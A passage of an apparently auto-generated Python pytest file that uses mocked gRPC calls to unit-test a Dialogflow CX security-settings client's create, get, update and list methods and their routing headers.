    assert response.display_name == 'display_name_value'
    assert response.redaction_strategy == gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE
    assert response.redaction_scope == gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE
    assert response.inspect_template == 'inspect_template_value'
    assert response.deidentify_template == 'deidentify_template_value'
    assert response.purge_data_types == [gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY]
@pytest.mark.asyncio
async def test_create_security_settings_async_from_dict():
    """Re-run the async CreateSecuritySettings test with a dict request."""
    await test_create_security_settings_async(request_type=dict)
def test_create_security_settings_field_headers():
    """The request's `parent` field must be echoed in the x-goog-request-params
    routing header (sync client)."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = gcdc_security_settings.CreateSecuritySettingsRequest()
    request.parent = 'parent/value'
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.create_security_settings),
            '__call__') as call:
        call.return_value = gcdc_security_settings.SecuritySettings()
        client.create_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        'x-goog-request-params',
        'parent=parent/value',
    ) in kw['metadata']
@pytest.mark.asyncio
async def test_create_security_settings_field_headers_async():
    """The request's `parent` field must be echoed in the x-goog-request-params
    routing header (async client)."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = gcdc_security_settings.CreateSecuritySettingsRequest()
    request.parent = 'parent/value'
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.create_security_settings),
            '__call__') as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gcdc_security_settings.SecuritySettings())
        await client.create_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        'x-goog-request-params',
        'parent=parent/value',
    ) in kw['metadata']
def test_create_security_settings_flattened():
    """Flattened kwargs (parent, security_settings) must be copied into the
    request object (sync client)."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.create_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value = gcdc_security_settings.SecuritySettings()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.create_security_settings(
            parent='parent_value',
            security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
        )
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].parent == 'parent_value'
        assert args[0].security_settings == gcdc_security_settings.SecuritySettings(name='name_value')
def test_create_security_settings_flattened_error():
    """Mixing a request object with flattened kwargs must raise ValueError
    (sync client)."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.create_security_settings(
            gcdc_security_settings.CreateSecuritySettingsRequest(),
            parent='parent_value',
            security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
        )
@pytest.mark.asyncio
async def test_create_security_settings_flattened_async():
    """Flattened kwargs (parent, security_settings) must be copied into the
    request object (async client)."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.create_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        # (The original first assigned a plain SecuritySettings and immediately
        # overwrote it with the awaitable below — that dead assignment is removed.)
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gcdc_security_settings.SecuritySettings())
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.create_security_settings(
            parent='parent_value',
            security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
        )
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].parent == 'parent_value'
        assert args[0].security_settings == gcdc_security_settings.SecuritySettings(name='name_value')
@pytest.mark.asyncio
async def test_create_security_settings_flattened_error_async():
    """Mixing a request object with flattened kwargs must raise ValueError
    (async client)."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.create_security_settings(
            gcdc_security_settings.CreateSecuritySettingsRequest(),
            parent='parent_value',
            security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
        )
def test_get_security_settings(transport: str = 'grpc', request_type=security_settings.GetSecuritySettingsRequest):
    """GetSecuritySettings (sync): the stub is called once with the request and
    the mocked response fields round-trip into the returned proto."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport=transport,
    )
    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.get_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value = security_settings.SecuritySettings(
            name='name_value',
            display_name='display_name_value',
            redaction_strategy=security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE,
            redaction_scope=security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE,
            inspect_template='inspect_template_value',
            deidentify_template='deidentify_template_value',
            purge_data_types=[security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY],
            retention_window_days=2271,
        )
        response = client.get_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == security_settings.GetSecuritySettingsRequest()
    # Establish that the response is the type that we expect.
    assert isinstance(response, security_settings.SecuritySettings)
    assert response.name == 'name_value'
    assert response.display_name == 'display_name_value'
    assert response.redaction_strategy == security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE
    assert response.redaction_scope == security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE
    assert response.inspect_template == 'inspect_template_value'
    assert response.deidentify_template == 'deidentify_template_value'
    assert response.purge_data_types == [security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY]
def test_get_security_settings_from_dict():
    """Re-run the sync GetSecuritySettings test with a dict request."""
    test_get_security_settings(request_type=dict)
def test_get_security_settings_empty_call():
    """Calling get_security_settings() with no arguments must still send a
    default GetSecuritySettingsRequest."""
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport='grpc',
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.get_security_settings),
            '__call__') as call:
        client.get_security_settings()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == security_settings.GetSecuritySettingsRequest()
@pytest.mark.asyncio
async def test_get_security_settings_async(transport: str = 'grpc_asyncio', request_type=security_settings.GetSecuritySettingsRequest):
    """GetSecuritySettings (async): the stub is awaited with the request and
    the mocked response fields round-trip into the returned proto."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport=transport,
    )
    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.get_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(security_settings.SecuritySettings(
            name='name_value',
            display_name='display_name_value',
            redaction_strategy=security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE,
            redaction_scope=security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE,
            inspect_template='inspect_template_value',
            deidentify_template='deidentify_template_value',
            purge_data_types=[security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY],
        ))
        response = await client.get_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == security_settings.GetSecuritySettingsRequest()
    # Establish that the response is the type that we expect.
    assert isinstance(response, security_settings.SecuritySettings)
    assert response.name == 'name_value'
    assert response.display_name == 'display_name_value'
    assert response.redaction_strategy == security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE
    assert response.redaction_scope == security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE
    assert response.inspect_template == 'inspect_template_value'
    assert response.deidentify_template == 'deidentify_template_value'
    assert response.purge_data_types == [security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY]
@pytest.mark.asyncio
async def test_get_security_settings_async_from_dict():
    """Re-run the async GetSecuritySettings test with a dict request."""
    await test_get_security_settings_async(request_type=dict)
def test_get_security_settings_field_headers():
    """The request's `name` field must be echoed in the x-goog-request-params
    routing header (sync client)."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = security_settings.GetSecuritySettingsRequest()
    request.name = 'name/value'
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.get_security_settings),
            '__call__') as call:
        call.return_value = security_settings.SecuritySettings()
        client.get_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        'x-goog-request-params',
        'name=name/value',
    ) in kw['metadata']
@pytest.mark.asyncio
async def test_get_security_settings_field_headers_async():
    """The request's `name` field must be echoed in the x-goog-request-params
    routing header (async client)."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = security_settings.GetSecuritySettingsRequest()
    request.name = 'name/value'
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.get_security_settings),
            '__call__') as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(security_settings.SecuritySettings())
        await client.get_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        'x-goog-request-params',
        'name=name/value',
    ) in kw['metadata']
def test_get_security_settings_flattened():
    """The flattened `name` kwarg must be copied into the request object
    (sync client)."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.get_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value = security_settings.SecuritySettings()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.get_security_settings(
            name='name_value',
        )
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].name == 'name_value'
def test_get_security_settings_flattened_error():
    """Mixing a request object with flattened kwargs must raise ValueError
    (sync client)."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.get_security_settings(
            security_settings.GetSecuritySettingsRequest(),
            name='name_value',
        )
@pytest.mark.asyncio
async def test_get_security_settings_flattened_async():
    """The flattened `name` kwarg must be copied into the request object
    (async client)."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.get_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        # (The original first assigned a plain SecuritySettings and immediately
        # overwrote it with the awaitable below — that dead assignment is removed.)
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(security_settings.SecuritySettings())
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.get_security_settings(
            name='name_value',
        )
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].name == 'name_value'
@pytest.mark.asyncio
async def test_get_security_settings_flattened_error_async():
    """Mixing a request object with flattened kwargs must raise ValueError
    (async client)."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.get_security_settings(
            security_settings.GetSecuritySettingsRequest(),
            name='name_value',
        )
def test_update_security_settings(transport: str = 'grpc', request_type=gcdc_security_settings.UpdateSecuritySettingsRequest):
    """UpdateSecuritySettings (sync): the stub is called once with the request
    and the mocked response fields round-trip into the returned proto."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport=transport,
    )
    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.update_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value = gcdc_security_settings.SecuritySettings(
            name='name_value',
            display_name='display_name_value',
            redaction_strategy=gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE,
            redaction_scope=gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE,
            inspect_template='inspect_template_value',
            deidentify_template='deidentify_template_value',
            purge_data_types=[gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY],
            retention_window_days=2271,
        )
        response = client.update_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == gcdc_security_settings.UpdateSecuritySettingsRequest()
    # Establish that the response is the type that we expect.
    assert isinstance(response, gcdc_security_settings.SecuritySettings)
    assert response.name == 'name_value'
    assert response.display_name == 'display_name_value'
    assert response.redaction_strategy == gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE
    assert response.redaction_scope == gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE
    assert response.inspect_template == 'inspect_template_value'
    assert response.deidentify_template == 'deidentify_template_value'
    assert response.purge_data_types == [gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY]
def test_update_security_settings_from_dict():
    """Re-run the update test with a dict-typed request body."""
    test_update_security_settings(request_type=dict)
def test_update_security_settings_empty_call():
    """A call with neither a request nor flattened fields sends the default request."""
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport='grpc',
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.update_security_settings),
            '__call__') as call:
        client.update_security_settings()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == gcdc_security_settings.UpdateSecuritySettingsRequest()
@pytest.mark.asyncio
async def test_update_security_settings_async(transport: str = 'grpc_asyncio', request_type=gcdc_security_settings.UpdateSecuritySettingsRequest):
    """Async variant: UpdateSecuritySettings round-trips through the async stub."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport=transport,
    )
    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.update_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(gcdc_security_settings.SecuritySettings(
            name='name_value',
            display_name='display_name_value',
            redaction_strategy=gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE,
            redaction_scope=gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE,
            inspect_template='inspect_template_value',
            deidentify_template='deidentify_template_value',
            purge_data_types=[gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY],
        ))
        response = await client.update_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == gcdc_security_settings.UpdateSecuritySettingsRequest()
    # Establish that the response is the type that we expect.
    assert isinstance(response, gcdc_security_settings.SecuritySettings)
    assert response.name == 'name_value'
    assert response.display_name == 'display_name_value'
    assert response.redaction_strategy == gcdc_security_settings.SecuritySettings.RedactionStrategy.REDACT_WITH_SERVICE
    assert response.redaction_scope == gcdc_security_settings.SecuritySettings.RedactionScope.REDACT_DISK_STORAGE
    assert response.inspect_template == 'inspect_template_value'
    assert response.deidentify_template == 'deidentify_template_value'
    assert response.purge_data_types == [gcdc_security_settings.SecuritySettings.PurgeDataType.DIALOGFLOW_HISTORY]
@pytest.mark.asyncio
async def test_update_security_settings_async_from_dict():
    """Re-run the async update test with a dict-typed request body."""
    await test_update_security_settings_async(request_type=dict)
def test_update_security_settings_field_headers():
    """The routing header reflecting security_settings.name is sent as metadata."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = gcdc_security_settings.UpdateSecuritySettingsRequest()
    request.security_settings.name = 'security_settings.name/value'
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.update_security_settings),
            '__call__') as call:
        call.return_value = gcdc_security_settings.SecuritySettings()
        client.update_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        'x-goog-request-params',
        'security_settings.name=security_settings.name/value',
    ) in kw['metadata']
@pytest.mark.asyncio
async def test_update_security_settings_field_headers_async():
    """Async variant: routing header for security_settings.name is sent as metadata."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = gcdc_security_settings.UpdateSecuritySettingsRequest()
    request.security_settings.name = 'security_settings.name/value'
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.update_security_settings),
            '__call__') as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gcdc_security_settings.SecuritySettings())
        await client.update_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        'x-goog-request-params',
        'security_settings.name=security_settings.name/value',
    ) in kw['metadata']
def test_update_security_settings_flattened():
    """Flattened keyword args are packed into the request object."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.update_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value = gcdc_security_settings.SecuritySettings()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.update_security_settings(
            security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
            update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
        )
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].security_settings == gcdc_security_settings.SecuritySettings(name='name_value')
        assert args[0].update_mask == field_mask_pb2.FieldMask(paths=['paths_value'])
def test_update_security_settings_flattened_error():
    """Passing both a request object and flattened fields raises ValueError."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.update_security_settings(
            gcdc_security_settings.UpdateSecuritySettingsRequest(),
            security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
            update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
        )
@pytest.mark.asyncio
async def test_update_security_settings_flattened_async():
    """Async variant: flattened keyword args are packed into the request object."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.update_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        # (The sync-style assignment that used to precede this line was dead:
        # it was immediately overwritten by the awaitable below.)
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(gcdc_security_settings.SecuritySettings())
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.update_security_settings(
            security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
            update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
        )
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].security_settings == gcdc_security_settings.SecuritySettings(name='name_value')
        assert args[0].update_mask == field_mask_pb2.FieldMask(paths=['paths_value'])
@pytest.mark.asyncio
async def test_update_security_settings_flattened_error_async():
    """Async variant: request object plus flattened fields raises ValueError."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.update_security_settings(
            gcdc_security_settings.UpdateSecuritySettingsRequest(),
            security_settings=gcdc_security_settings.SecuritySettings(name='name_value'),
            update_mask=field_mask_pb2.FieldMask(paths=['paths_value']),
        )
def test_list_security_settings(transport: str = 'grpc', request_type=security_settings.ListSecuritySettingsRequest):
    """ListSecuritySettings forwards the request and returns a pager with the response token."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport=transport,
    )
    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.list_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value = security_settings.ListSecuritySettingsResponse(
            next_page_token='next_page_token_value',
        )
        response = client.list_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == security_settings.ListSecuritySettingsRequest()
    # Establish that the response is the type that we expect.
    assert isinstance(response, pagers.ListSecuritySettingsPager)
    assert response.next_page_token == 'next_page_token_value'
def test_list_security_settings_from_dict():
    """Re-run the list test with a dict-typed request body."""
    test_list_security_settings(request_type=dict)
def test_list_security_settings_empty_call():
    """A call with neither a request nor flattened fields sends the default request."""
    # This test is a coverage failsafe to make sure that totally empty calls,
    # i.e. request == None and no flattened fields passed, work.
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport='grpc',
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.list_security_settings),
            '__call__') as call:
        client.list_security_settings()
        call.assert_called()
        _, args, _ = call.mock_calls[0]
        assert args[0] == security_settings.ListSecuritySettingsRequest()
@pytest.mark.asyncio
async def test_list_security_settings_async(transport: str = 'grpc_asyncio', request_type=security_settings.ListSecuritySettingsRequest):
    """Async variant: ListSecuritySettings returns an async pager with the response token."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
        transport=transport,
    )
    # Everything is optional in proto3 as far as the runtime is concerned,
    # and we are mocking out the actual API, so just send an empty request.
    request = request_type()
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.list_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value =grpc_helpers_async.FakeUnaryUnaryCall(security_settings.ListSecuritySettingsResponse(
            next_page_token='next_page_token_value',
        ))
        response = await client.list_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == security_settings.ListSecuritySettingsRequest()
    # Establish that the response is the type that we expect.
    assert isinstance(response, pagers.ListSecuritySettingsAsyncPager)
    assert response.next_page_token == 'next_page_token_value'
@pytest.mark.asyncio
async def test_list_security_settings_async_from_dict():
    """Re-run the async list test with a dict-typed request body."""
    await test_list_security_settings_async(request_type=dict)
def test_list_security_settings_field_headers():
    """The routing header reflecting the request parent is sent as metadata."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = security_settings.ListSecuritySettingsRequest()
    request.parent = 'parent/value'
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.list_security_settings),
            '__call__') as call:
        call.return_value = security_settings.ListSecuritySettingsResponse()
        client.list_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        'x-goog-request-params',
        'parent=parent/value',
    ) in kw['metadata']
@pytest.mark.asyncio
async def test_list_security_settings_field_headers_async():
    """Async variant: routing header for the request parent is sent as metadata."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Any value that is part of the HTTP/1.1 URI should be sent as
    # a field header. Set these to a non-empty value.
    request = security_settings.ListSecuritySettingsRequest()
    request.parent = 'parent/value'
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.list_security_settings),
            '__call__') as call:
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(security_settings.ListSecuritySettingsResponse())
        await client.list_security_settings(request)
        # Establish that the underlying gRPC stub method was called.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0] == request
    # Establish that the field header was sent.
    _, _, kw = call.mock_calls[0]
    assert (
        'x-goog-request-params',
        'parent=parent/value',
    ) in kw['metadata']
def test_list_security_settings_flattened():
    """The flattened parent keyword arg is packed into the request object."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.list_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        call.return_value = security_settings.ListSecuritySettingsResponse()
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        client.list_security_settings(
            parent='parent_value',
        )
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls) == 1
        _, args, _ = call.mock_calls[0]
        assert args[0].parent == 'parent_value'
def test_list_security_settings_flattened_error():
    """Passing both a request object and flattened fields raises ValueError."""
    client = SecuritySettingsServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        client.list_security_settings(
            security_settings.ListSecuritySettingsRequest(),
            parent='parent_value',
        )
@pytest.mark.asyncio
async def test_list_security_settings_flattened_async():
    """Async variant: the flattened parent keyword arg is packed into the request."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
            type(client.transport.list_security_settings),
            '__call__') as call:
        # Designate an appropriate return value for the call.
        # (The sync-style assignment that used to precede this line was dead:
        # it was immediately overwritten by the awaitable below.)
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(security_settings.ListSecuritySettingsResponse())
        # Call the method with a truthy value for each flattened field,
        # using the keyword arguments to the method.
        response = await client.list_security_settings(
            parent='parent_value',
        )
        # Establish that the underlying call was made with the expected
        # request object values.
        assert len(call.mock_calls)
        _, args, _ = call.mock_calls[0]
        assert args[0].parent == 'parent_value'
@pytest.mark.asyncio
async def test_list_security_settings_flattened_error_async():
    """Async variant: request object plus flattened fields raises ValueError."""
    client = SecuritySettingsServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Attempting to call a method with both a request object and flattened
    # fields is an error.
    with pytest.raises(ValueError):
        await client.list_security_settings(
            security_settings.ListSecuritySettingsRequest(),
            parent='parent_value',
        )
def test_list_security_settings_pager():
    """The sync pager walks all pages and yields every SecuritySettings item."""
    client = SecuritySettingsServiceClient(
        # Instantiate the credentials object, consistent with every other
        # test in this file (the class itself was previously passed).
        credentials=ga_credentials.AnonymousCredentials(),
    )
    # Mock the actual call within the gRPC stub, and fake the request.
    with mock.patch.object(
